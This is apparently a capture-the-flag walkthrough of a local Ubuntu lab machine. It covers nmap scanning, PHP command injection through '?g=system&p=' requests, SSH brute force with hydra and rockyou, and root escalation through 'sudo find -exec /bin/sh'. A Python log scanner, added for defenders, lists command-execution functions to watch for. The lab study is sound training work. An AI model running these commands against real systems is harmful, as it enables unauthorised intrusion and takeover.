OK, welcome everyone, I hope you find this writeup helpful.
So let's go hunting some flags 👻
First, they give us a virtual machine so that this challenge runs locally,
like this,
but here we have an (Ubuntu) Server.
Let's start explaining from 0.
First we have an .ova file.
.ova = Open Virtual Appliance (Virtual Machine Disk Image)
So just drop it into VMware,
give it any name you want, then just run it.
When you run it
OK, leave it, let's start the real work ;)
Now we have 2 machines running:
our Kali machine, and the victim, which should be this (Ubuntu) Server.
Both of them are on the same network, that's why I say LOCAL.
So to find the victim's IP we will discover our network
to see who is on it with us.
You can use $ netdiscover
or $ nmap -sn subnet
or do what I do: nmap over the full range.
First let's get our IP on the network = $ ip a
NOTE !!!
There are many ways to solve it, so do what you want
So here is our IP:
192.xxx.xxx.164/24
To scan the full range, replace 164 with 0.
I will use nmap:
nmap 192.xxx.xxx.0/24
You will find something like
192.xxx.xxx.0 && 192.xxx.xxx.1 && 192.xxx.xxx.2 && 192.xxx.xxx.3
In our case I found the IP, and there are 2 ports open,
so let's get more details:
nmap -sV -A 192.xxx.xxx.3 -p 80,22
You can go search for exploits for them, but in this case I will go to HTTP and check it.
There is a little PHP code.
There are the parameters g, p, h.
Let's move this to Burp = I found command injection:
/?g=system&p="your command here"
So from here we can get a reverse shell and be done,
but there is another way, let's play.
OK, here we have database.php and index.php.
Let's see what is inside database.php:
/?g=system&p=cat%20database.php
OK, this is the second solution: we get the username.
Or you can do the same from the web page with show_source:
?g=show_source&p=database.php
Anyway, we get the user, it is = auditor
Little trick you can do = ?g=system&p=ls%20/home to get the user
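For the defending side, the requests above leave a clear trace in the web server's access log. This is an added example, not part of the original writeup: it scans combined-format access log lines for a g parameter that names a command-execution or file-disclosure PHP function. The log lines, IP addresses and the RISKY list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# PHP functions that run commands or disclose files when a request can pick the callable.
# Assumed watch list for this example, not taken from the challenge.
RISKY = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open",
         "show_source", "highlight_file", "readfile", "file_get_contents"}

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines (documentation IP ranges), modelled on the requests in this writeup.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /?g=system&p=cat%20database.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /?g=show_source&p=database.php HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /?g=%53ystem&p=ls%20/home HTTP/1.1" 200 64',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /?g=strtoupper&p=hello HTTP/1.1" 200 20',
    '198.51.100.7 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 300',
]

def find_callable_abuse(lines, func_param="g", arg_param="p"):
    """Return (client_ip, function, argument, status) for each request whose
    func_param names a risky PHP function."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line, skip it
        # parse_qs URL-decodes, so %53ystem and cat%20database.php are normalised first
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for func in query.get(func_param, []):
            name = func.strip().lower()  # PHP function names are case-insensitive
            if name in RISKY:
                arg = query.get(arg_param, [""])[0]
                hits.append((m["ip"], name, arg, int(m["status"])))
    return hits

if __name__ == "__main__":
    for ip, name, arg, status in find_callable_abuse(SAMPLE):
        print(f"{ip} called {name}({arg!r}) -> HTTP {status}")
```
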
So now we have the username,
and we can brute force SSH with this user:
hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ssh
So we get the username and password for SSH,
so we get the user flag. Done, let's get root.
Now we need privilege escalation.
First let's check the sudo version:
no exploit for it right now.
Let's see what we can run as root.
OK nice, we can run find as root.
To get root I will use
sudo find . -exec /bin/sh \; -quit
So we get root, let's get the flag.